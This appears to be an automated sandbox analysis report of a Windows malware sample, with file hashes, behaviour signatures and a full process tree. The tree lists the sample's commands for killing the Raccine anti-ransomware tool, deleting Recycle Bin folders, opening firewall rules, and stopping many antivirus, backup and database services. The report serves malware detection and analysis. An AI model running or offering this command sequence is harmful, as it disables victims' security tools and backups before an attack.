Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:57
General
-
Target
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
-
Size
115KB
-
MD5
5584b055a41bad2ebd33c88e9f6ebf64
-
SHA1
76b0d1fe179a03d3b62f11a07030edf510d9c7fa
-
SHA256
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58
-
SHA512
23628cd1081bbc5679ca4b8dac50b17c2004ad787e1d64de2685a8e23eb99a9ae37343f29983bee2cab0b08f61f06d40f877139fb458367c207d64691aa94f14
Score
8/10
Malware Config
Signatures
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 6 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start Dnscache /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop bedbg /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start FDResPub /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start SSDPSRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start upnphost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EhttpSrv /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MMS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mozyprobackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ESHASRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SDRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EsgShKernel /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLWriter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop klnagent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFSGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop kavfsslp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop macmnsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
- Suspicious use of WriteProcessMemory
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop masvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵
-
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBAMService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL57 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQL Backups /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McShield /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfefire /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McTaskManager /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfemms /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RESvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfevtp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SepMasterService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop IISAdmin /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
-
-
